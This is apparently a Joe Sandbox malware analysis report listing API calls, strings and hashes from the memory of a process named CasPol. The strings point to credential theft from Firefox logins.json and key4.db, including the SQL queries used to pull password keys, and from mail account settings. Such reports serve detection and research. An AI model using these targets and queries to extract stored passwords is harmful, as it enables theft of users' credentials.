                                                                                                                                                                                  • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                  • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                  • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                  • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                  • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                  • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                  • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                    • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                    • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                                                                                                                                                                                    • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                    • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                    • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                  • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                  • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                  • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                  • API String ID: 1703216249-3046471546
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,?,?,?,770145ED,?,00000000), ref: 00402533
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                  • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                  • API String ID: 168965057-606283353
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                  • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                  • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                  • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                  • API String ID: 1428123949-3474136107
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                  • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00401166
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                  • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2998058495-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                    • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                  • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                  • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040BECE
                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                    • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                    • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                  • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                  • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                  • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                  • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                  • API String ID: 2303586283-933021314
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                                                                                  • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                  • API String ID: 231171946-2189169393
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                  • API String ID: 633282248-1996832678
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00406782
                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040686E
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004068EC
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004069B2
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004069CA
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00406A4A
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                  • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • , xrefs: 00406834
                                                                                                                                                                                  • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                  • key4.db, xrefs: 00406756
                                                                                                                                                                                  • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                  • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                  • API String ID: 3614188050-3983245814
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                  • API String ID: 710961058-601624466
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                  • API String ID: 3402215030-3842416460
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                    • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                                                                                                                                                                                    • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                    • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                    • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                    • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                  • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                  • API String ID: 2003275452-3138536805
                                                                                                                                                                                  • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                  • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                  • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                  • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                  • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
